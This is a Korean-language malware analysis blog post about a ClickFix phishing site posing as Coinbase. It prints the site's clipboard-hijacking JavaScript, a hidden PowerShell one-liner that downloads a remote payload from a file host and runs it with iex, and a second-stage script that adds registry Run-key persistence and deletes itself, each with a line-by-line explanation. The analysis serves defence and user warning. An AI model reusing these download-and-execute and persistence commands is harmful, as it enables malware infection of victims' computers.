Coinbase 로 위장한 클릭픽스(ClickFix)사이트-217(.)60(.)37(.)55(2025.8.3)

오늘은 코인베이스 로 위장한 클릭픽스(ClickFix)사이트 인 217(.)60(.)37(.)55를 분석을 해보겠습니다. 미국 가상화폐(암호화폐)사이트인 코인베이스(Coinbase)를 사칭을 하는 클릭픽스 사이트입니다.
일단 사이트를 접속하고 나면 정상적은 코인베이스(Coinbase) 사이트가 아니고 전형적인 클릭픽스(ClickFix) 사이트인 것을 확인할 수가 있습니다.
일단 해당 사이트를 접속하면 다음과 같은 화면을 볼 수가 있습니다.
언제나 물어보는 Verify you are human by completing the action below.
아래의 작업을 완료하여 인간임을 확인해 주세요.
일단 여기서 인간인 것을 증명하기 위해서 클릭을 하면 클릭이 안 됨 아마도 미완성이 아닐까? 생각이 됩니다.

코인베이스(Coinbase) 클릭픽스 사이트

여기서 웹 소스를 보면 다음과 같은 Powershell 이 있는 것을 확인할 수가 있습니다.

클릭픽스 웹소스

cmd /c start /min powershell -E KABcAFcAKgBc??????AqAHUAcgBsACoAZQAgAGgAdAB0A
HA???????AHwAc
ABvAHcAZQByA????GwAbAA=";

여기에서 Base64 부분을 다시 분해를 해보면 다음과 같은 결과를 얻을 수가 있습니다.

(\W*\S*32\*url*e hxxps://)|power(s)hell

Bsse 64 디코딩

이지만 실제로 실행이 되는 Powershell 코드는 다음과 같습니다.

const ac = `powershell -w h -nop -c "$h='hxxps://0x0(.)st/8D1H(.)dof';$xjs=New-Object -Com Microsoft(.)XMLHTTP;$xjs.open('GET',$h,$false);$xjs(.)send();$pv=[Text.Encoding]::UTF8.GetString($xjs.res(p)onseBody);iex $pv"`
document.addEventLi(s)tener('DO(M)ContentLoaded', function() {
    document.querySelector('button(#)che(c)kbox.checkbox.step1').addEventListener('click', function() {
        navigator.cl(i)pboard.writeText(ac)
    });
});

악성코드 분석

실제로 실행로 실행이 되는 Powershell 코드

1.코드 내용 분석
-w h:PowerShell 창을 숨김(hidden) 모드 실행
-nop:No Profile,사용자 프로필 스크립트를 로드 하지 않음 탐지 회피 목적
-c: 뒤의 문자열을 명령으로 실행
PowerShell 내부 동작:
$h=hxxps://0x0(.)st/8D1H(.)dof:악성 페이로드가 저장된 URL 설정
$xjs=New-Object -Com Microsoft(.)XMLHTTP;COM 객체(XMLHTTP) 사용하여 HTTP 요청 생성
$xjs.open('GET'(,)$h,$f(a)lse); $xjs(.)send();:URL로 GET 요청 전송 응답을 동기적으로 받음
$pv=[Text(.)Encoding]::UTF8(.)GetString($xjs.responseBody);:응답 데이터를 UTF-8 문자열로 변환
iex $pv:Invoke-Expression 으로 받은 데이터를 바로 실행 즉 원격에서 내려받은 코드(스크립트)를 메모리에서 바로 실행하는 방식을 취하고 있음
2.JavaScript 부분
DOM 로드 후 실행을 하며 특정 버튼(button#checkbox.checkbox.step1) 클릭 시 ac 변수를 클립보드에 복사 쉽게 이야기해서 클릭픽스 사이트에서 사용자가 버튼을 누르면 해당 악성 PowerShell 명령을 복사하게 해서 사용자 스스로 터미널이나 CMD에 붙여 넣고 실행하게 하는 방식을 취하고 있음
hxxps://0x0(.)st/8D1H(.)dof 에서 바로 읽어들이는 방식으로 악성코드 유포

8D1H(.)dof 포함된 Powershell 코드

8D1H 에 포함된 파워셀 코드

start "" /b "%USERPROFILE%\Pictures\Camera Roll\dWBc???5Jcih\Encrypted-Generator64(.)exe"

del "%~f0"');Start-Sleep -Seconds (Get-Random -Minimum 2 -Maximum 4);Set-ItemProperty 
-Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -Name 'iVJnPxfT' -Value "$en
v:USERPROFILE\Pictures\Camera Roll\dW???c?5Jcih\Encrypted-Generator64.exe";Start-Sleep -
Seconds (Get-Random -Minimum 2 -Maximum 4);$ws=New-Object -ComObject WScript(.)Shell;$ws.
Run($oNMSwjQg,0,$false);Remove-Item $MyInvocation.MyCommand.Path -Force

악성코드 분석

start "" /b:콘솔 창 없이 백그라운드로 프로그램 실행
%USERPROFILE%\Pictures\Camera Roll\dWBcy5Jcih\Encrypted-Generator64.exe:피해자 사진 폴더 안에 숨긴 악성코드 실행
현재 실행 중인 배치 파일을 삭제 자기 삭제 일명 자폭 모드
2.지연 시작
실행 사이에 2~4초 랜덤 지연
탐지 회피 및 분석 지연 목적으로 사용
3.레지스터리 자동 시작 등록
레지스트리 Run 키 추가
Windows 로그인 시 Encrypted-Generator64.exe가 자동 실행되도록 함 즉 컴퓨터와 노트북이 실행되면 악성코드 실행
iVJnPxfT 는 무작위 문자열->탐지 어렵게 하는 것이 목적
4.WScript.Shell COM 객체 악용
WScript.Shell COM 객체 로 또 다른 명령 실행
$oNMSwjQg 변수에 악성코드 실행 경로 있음
0: 당연히 창 숨김 실행
5.자가 삭제 일명 폭파
현재 실행 중인 PowerShell 스크립트 삭제
이렇게 악성코드가 실행되면 BitDefender 경우 다음과 같은 진단명으로 탐지하고 있음
Trojan.GenericKD.76962907(2025-08-04 06:09:48 UTC ) 기준
일단 Norton Site Review 하고 Avast,Emsisoft Browser Security쪽은 신고했으면 일단 이런 종류가 최근 유행을 하고 있으니 클릭픽스(ClickFix) 공격에 조심하는 습관을 가지고 기본적으로 이름이 있는 백신 프로그램을 사용하는 것을 추천합니다.